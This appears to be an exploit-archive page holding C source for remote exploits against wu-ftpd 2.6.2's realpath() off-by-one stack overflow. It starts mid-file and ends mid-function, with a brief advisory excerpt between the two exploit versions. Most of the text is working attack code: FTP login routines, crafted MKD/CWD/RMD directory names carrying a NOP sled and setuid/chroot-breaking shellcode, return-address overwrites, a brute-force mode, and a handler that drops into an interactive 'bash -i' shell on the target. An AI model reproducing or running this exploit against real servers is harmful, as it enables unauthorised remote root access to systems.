			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));	/* 04 */
			fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));	/* 05 */
			fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));	/* 06 */
			fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));	/* 07 */
			fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));	/* 08 */
			fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));	/* 09 */
			fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));	/* 10 */
			fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));	/* 11 */
			fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));	/* 12 */
			fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));	/* 13 */
			fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));	/* 14 */
			fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));	/* 15 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 16 */
			break;
		case 3:
		case 4:
		case 5:
		case 6:
		case 7:
		case 8:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 04 */
			break;
	}
	if(type&&__exp_test)
	{
		__exp_test=(NRL);
		if(((int)check_exp(sock))==(FAD))
		{
			fprintf(stderr," [-] This isn't vulnerable.\n\n");
			exit(FAD);
		}
	}
	return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
	int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)atk_bf,(NRL),(GET_R));
	if(type) /* MKD command */
	{
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x4b);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	else /* RMD command */
	{
		atk_bf[cmd_f++]=(0x52);
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
		atk_bf[r_rn_1++]=(0x41);
	{
		int chk_0xff=(NRL);
		switch(t_g)
		{
			case 0:
			case 1:
			case 2:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
			case 3:
			case 4:
			case 5:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				break;
			case 6:
			case 7:
			case 8:
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
		}
		*(long *)&atk_bf[r_rn_1]=0x41414141;
		r_rn_1+=(DEF_ALIGN);
		*(long *)&atk_bf[r_rn_1]=0x0d414141;
		r_rn_1+=(DEF_ALIGN);
		atk_bf[r_rn_1++]=(0x0a);
	}
	send(sock,atk_bf,strlen(atk_bf),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(type) /* MKD command */
	{
		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
	}
	else /* RMD command */
	{
		if(!strstr(get_nm,(CWD_COMM_SCS)))
		{
			fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
	}
	return;
}

int main(int argc,char *argv[])
{
	int opt_g,sock,__bf=(NRL);
	int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
	char user_id[(DEF_VA)]=(DEF_STR);
	char pass_wd[(DEF_VA)]=(DEF_STR);
	char tg_host[(DEF_VA)]=(DEF_HOST);
	int tg_port=(DEF_PORT);
	u_long sh_addr=(plat[t_g].sh_addr);

	(void)banrl();
	while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
	{
		extern char *optarg;
		switch(opt_g)
		{
			case 'Q':
			case 'q':
				fprintf(stdout," [*] Banner scan mode.\n");
				b_scan=(SCS);
				break;
				
			case 'C':
			case 'c':
				fprintf(stdout," [*] Check exploit test mode.\n");
				__exp_test=(SCS);
				break;

			case 'M':
			case 'm':
				mx_bf=(atoi(optarg));
				bf_lsz=((0x1000)/mx_bf);
				break;

			case 'H':
			case 'h':
				memset((char *)tg_host,(NRL),sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'U':
			case 'u':
				memset((char *)user_id,(NRL),sizeof(user_id));
				strncpy(user_id,optarg,sizeof(user_id)-1);
				break;
				
			case 'P':
			case 'p':
				memset((char *)pass_wd,(NRL),sizeof(pass_wd));
				strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
				break;
				
			case 'N':
			case 'n':
				tg_port=(atoi(optarg));
				break;
				
			case 'S':
			case 's':
				sh_addr=strtoul(optarg,(NRL),(NRL));
				break;
				
			case 'T':
			case 't':
				if((t_g=(atoi(optarg)))<(9))
					sh_addr=(plat[t_g].sh_addr);
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'B':
			case 'b':
				if((t_g=(atoi(optarg)))<(9))
				{
					sh_addr=(plat[t_g].bf_addr);
					__bf=(SCS);
				}
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'I':
			case 'i':
				(void)prcode_usage(argv[(NRL)]);
				break;
				
			case '?':
				(void)prcode_usage(argv[(NRL)]);
				break;
		}
	}
	if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
		(void)prcode_usage(argv[(NRL)]);
	
	memset((char *)home_dir,(NRL),sizeof(home_dir));
	snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);

	if(!__bf)
	{
		fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
		sh_addr=(u_long)null_chk(sh_addr);
		fprintf(stdout," [+] address: %p.\n",sh_addr);
		fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [  OK  ]\n");

		fprintf(stdout," [1] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [2] send exploit code.\n");
		(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
		close(sock);

		fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [  OK  ]\n");

		fprintf(stdout," [3] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [4] send exploit code.\n");
		(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

		fprintf(stdout," [5] Waiting, execute the shell ");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);

		fprintf(stdout,".\n");
		(void)conn_shell(sock,sh_addr);
		close(sock);
	}
	else
	{
		int bt_num=(NRL);
		fprintf(stdout," [*] Brute-Force mode.\n");
		fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
		fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

		for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
		{
			sh_addr=(u_long)null_chk(sh_addr);
			fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
			fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [  OK  ]\n");
			
			fprintf(stdout," [1] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [2] send exploit code.\n");
			if(bt_num==(NRL))
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
			}
			else
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
			}
			close(sock);
			
			fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [  OK  ]\n");
			
			fprintf(stdout," [3] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [4] send exploit code.\n");
			(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
			
			fprintf(stdout," [5] Waiting, execute the shell ");
			fflush(stdout);
			(u_int)sleep(SCS);

			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".\n");
			(void)conn_shell(sock,sh_addr);
			close(sock);

			sh_addr+=(bf_lsz);
		}
	}
	exit(NRL);
}

int setsock(char *u_host,int u_port)
{
	int sock;
	struct hostent *sxp;
	struct sockaddr_in sxp_addr;
 
	if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
	{
		return(FAD);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
	{
		return(FAD);
	}
	sxp_addr.sin_family=AF_INET;
	sxp_addr.sin_port=htons(u_port);
	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
	bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
	{
		return(FAD);
	}
	return(sock);
}

void conn_shell(int conn_sock,u_long scs_addr)
{
	int died;
	int ex_t=(NRL);
	char *command,readbuf[(GET_R)];
	fd_set rset;

	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
			command=(DEF_COMM);
			break;
		case 6:
		case 7:
		case 8:
			command=(DEF_COMM_OB);
			break;
	}
	memset((char *)readbuf,(NRL),sizeof(readbuf));
	fprintf(stdout," [*] Send, command packet !\n\n");
	send(conn_sock,command,strlen(command),(NRL));

	for(;;)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(conn_sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(conn_sock+1,&rset,NULL,NULL,NULL);

		if(FD_ISSET(conn_sock,&rset))
		{
			died=read(conn_sock,readbuf,sizeof(readbuf)-1);
			if(died<=(NRL))
			{
				if(!ex_t)
				{
					fprintf(stderr," [-] exploit failure.\n\n");
					return;
				}
				else
				{
		fprintf(stdout," [*] exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
					exit(NRL);
				}
			}
			readbuf[died]=(NRL);
			fprintf(stdout,"%s",readbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
			if(died>(NRL))
			{
				readbuf[died]=(NRL);
				if(strstr(readbuf,"exit"))
					ex_t=(SCS);
				write(conn_sock,readbuf,died);
			}
		}
	}
	return;
}

void re_connt(int st_sock_va)
{
	if(st_sock_va==(FAD))
	{
		fprintf(stdout," [ Fail ]\n\n");
		exit(FAD);
	}
}

void banrl()
{
	fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

int check_exp(int sock)
{
	int conn_died;
	char gt_bf[(GET_R)];

	fprintf(stdout,"\n [+] Check exploit test ...\n");
	send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
	(u_int)sleep(SCS);
	memset((char *)gt_bf,(NRL),sizeof(gt_bf));
	conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);

	if(strstr(gt_bf,(CMD_ERROR)))
	{
		fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
		return(FAD);
	}
	else if(conn_died<=(NRL))
	{
		fprintf(stdout," [*] Ok, This is vulnerable version.\n\n");
		return(SCS);
	}
	else return(FAD);
}

/* eoc */

// milw0rm.com [2003-08-11]
		

- 漏洞信息 (22974)

wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22974)
unix remote
2003-08-02 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/8315/info

The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable. 

Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions. 

NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
**         August 3, Brute-Force function addition.
** --
** Thank you.
**
*/

#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();

struct os
{
        int num;
        char *v_nm;
        u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
        /* setuid/chroot-break/execve shellcode by Lam3rZ */
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
        "\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
        "\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
        "\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
        "\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
        "\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
        "\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
        "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
        "\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
        "\x2e\x2e\x31\x31";

struct os plat[]=
{
        /*
        ** I enjoy version up, will not share more. :-}
        */
        {
                0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
        },
        {
                1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
        },
        {
                2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
        },
        {
                0x82,NULL,0x0
        },
        {
                0x8282,"Brute-Force mode",0x0806a082
        }
};

void prcode_usage(char *f_nm)
{
        int r_n=(NRL);
        fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
        fprintf(stdout," \t-h [hostname]   : Target hostname & ip.\n");
        fprintf(stdout," \t-u [userid]     : User id.\n");
        fprintf(stdout," \t-p [passwd]     : User password.\n");
        fprintf(stdout," \t-n [port num]   : Target port number.\n");
        fprintf(stdout," \t-s [shelladdr]  : Shellcode address.\n");
        fprintf(stdout," \t-b              : Brute-Force mode.\n");
        fprintf(stdout," \t-m [max num]    : Brute-Force Count number.\n");
        fprintf(stdout," \t-i              : help information.\n");
        fprintf(stdout," \t-t [target num] : Select target number.\n\n");
        for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
        {
                fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
        }
        fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
        exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
        if((sh_addr>>(NRL)&0xff)==(0x00))
        {
                return(sh_addr+=(SCS));
        }
        else return(sh_addr);
}

void ftpd_login(int sock,char *user,char *pass)
{
        char send_recv[(GET_R)];

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(!strstr(send_recv,(FTP_CONN_SCS)))
        {
                fprintf(stdout," [-] ftpd connection failure.\n\n");
                close(sock);
                exit(FAD);
        }
        else fprintf(stdout," [*] ftpd connection success.\n");
        fprintf(stdout," [+] User id input.\n");

        memset((char *)send_recv,(NRL),sizeof(send_recv));
        snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
        send(sock,send_recv,strlen(send_recv),(NRL));

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(!strstr(send_recv,(FTP_USER_FAD)))
        {
                fprintf(stdout," [-] User id input failure.\n\n");
                close(sock);
                exit(FAD);
        }
        else fprintf(stdout," [+] User password input.\n");

        memset((char *)send_recv,(NRL),sizeof(send_recv));
        snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
        send(sock,send_recv,strlen(send_recv),(NRL));

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(strstr(send_recv,(FTP_LOGIN_FAD)))
        {
                fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
                close(sock);
                exit(FAD);
        }
        else if(strstr(send_recv,(FTP_LOGIN_SCS)))
        {
                fprintf(stdout," [*] User %s logged in.\n",user);
        }
        else
        {
                fprintf(stdout," [-] ftpd handshake failure.\n\n");
                close(sock);
                exit(FAD);
        }
        return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
        int dr_n=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)dir_nm,(NRL),(GET_R));
        /* MKD command */
        dir_nm[cmd_f++]=(0x4d);
        dir_nm[cmd_f++]=(0x4b);
        dir_nm[cmd_f++]=(0x44);
        dir_nm[cmd_f++]=(0x20);

        for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
        {
                dir_nm[dr_n]=(gb_character);
        }
        dir_nm[dr_n++]=(0x0d);
        dir_nm[dr_n++]=(0x0a);

        if(type)
        {
                send(sock,dir_nm,strlen(dir_nm),(NRL));
                (u_int)sleep(SCS);
                memset((char *)get_nm,(NRL),sizeof(get_nm));
                recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD command failed.\n\n");
                        exit(FAD);
                }
        }
        /* CMD command */
        cmd_f=(NRL);
        dir_nm[cmd_f++]=(0x43);
        dir_nm[cmd_f++]=(0x57);
        dir_nm[cmd_f++]=(0x44);

        send(sock,dir_nm,strlen(dir_nm),(NRL));
        (u_int)sleep(SCS);
        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

        if(!strstr(get_nm,(CWD_COMM_SCS)))
        {
                fprintf(stdout," [-] CWD command failed.\n\n");
                exit(FAD);
        }
        return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
        int dr_n=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)dir_nm,(NRL),(GET_R));
        /* MKD command */
        dir_nm[cmd_f++]=(0x4d);
        dir_nm[cmd_f++]=(0x4b);
        dir_nm[cmd_f++]=(0x44);
        dir_nm[cmd_f++]=(0x20);

        for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
        {
                dir_nm[dr_n]=(DEF_NOP);
        }
        for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
        {
                dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
        }
        dir_nm[dr_n++]=(0x0d);
        dir_nm[dr_n++]=(0x0a);

        if(type)
        {
                send(sock,dir_nm,strlen(dir_nm),(NRL));
                (u_int)sleep(SCS);
                memset((char *)get_nm,(NRL),sizeof(get_nm));
                recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
                        exit(FAD);
                }
        }
        /* CMD command */
        cmd_f=(NRL);
        dir_nm[cmd_f++]=(0x43);
        dir_nm[cmd_f++]=(0x57);
        dir_nm[cmd_f++]=(0x44);

        send(sock,dir_nm,strlen(dir_nm),(NRL));
        (u_int)sleep(SCS);
        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,(GET_R)-1,(NRL));

        if(!strstr(get_nm,(CWD_COMM_SCS)))
        {
                fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
                exit(FAD);
        }
        return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
        char atk_bf[(GET_R)];
        {
                fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));    /* 01 */
                fprintf(stdout," [+] 02: make shell-code directory.\n");
                (int)send_shellcode(sock,d_type,(atk_bf));      /* 02 */
                fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));    /* 03 */
                fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));    /* 04 */
                fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));    /* 05 */
                fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));    /* 06 */
                fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));    /* 07 */
                fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));    /* 08 */
                fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));    /* 09 */
                fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));    /* 10 */
                fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));    /* 11 */
                fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));    /* 12 */
                fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));    /* 13 */
                fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));    /* 14 */
                fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));    /* 15 */
                (int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
        }
        return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
        int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)atk_bf,(NRL),(GET_R));
        if(type) /* MKD command */
        {
                atk_bf[cmd_f++]=(0x4d);
                atk_bf[cmd_f++]=(0x4b);
                atk_bf[cmd_f++]=(0x44);
                atk_bf[cmd_f++]=(0x20);
        }
        else /* RMD command */
        {
                atk_bf[cmd_f++]=(0x52);
                atk_bf[cmd_f++]=(0x4d);
                atk_bf[cmd_f++]=(0x44);
                atk_bf[cmd_f++]=(0x20);
        }
        for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
                atk_bf[r_rn_1++]=(0x41);
        {
                *(long *)&atk_bf[r_rn_1]=(sh_addr);
                r_rn_1+=(DEF_ALIGN);
                *(long *)&atk_bf[r_rn_1]=(sh_addr);
                r_rn_1+=(DEF_ALIGN);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x0d);
                atk_bf[r_rn_1++]=(0x0a);
        }
        send(sock,atk_bf,strlen(atk_bf),(NRL));
        (u_int)sleep(SCS);
